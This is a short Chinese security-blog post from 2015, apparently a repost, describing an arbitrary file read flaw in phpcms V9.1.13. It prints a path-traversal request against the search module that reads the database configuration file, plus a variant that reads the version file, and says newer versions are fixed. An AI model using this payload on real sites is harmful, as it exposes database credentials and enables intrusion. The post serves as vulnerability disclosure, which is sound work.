• 选择风格
  • 加入收藏
  • 繁體中文
  • 网站地图
    • 当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

    phpcms V9最新任意读文件漏洞

    时间:2015/5/19 19:16:15 作者:平凡之路 来源:xuhantao.com 浏览:

    漏洞利用代码:

    /index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../
    phpsso_server/caches/configs/database.php




    原文:

    修复方案:这应该是以前版本的问题,红黑联盟编辑通过
    ?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../
    caches/configs/version.php



    确定为V9.1.13 20120129,www.xuhantao.com,涛涛电脑知识网,目前最新版本已不存在该问题

  • 上一篇:cookie注入中转注入笔记
  • 下一篇:豆丁文档第三方登陆未验证导致存储型xss
    • 相关文章
    • 没有相关文章
    共有评论 0相关评论
    发表我的评论
    • 大名:
    • 内容:
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1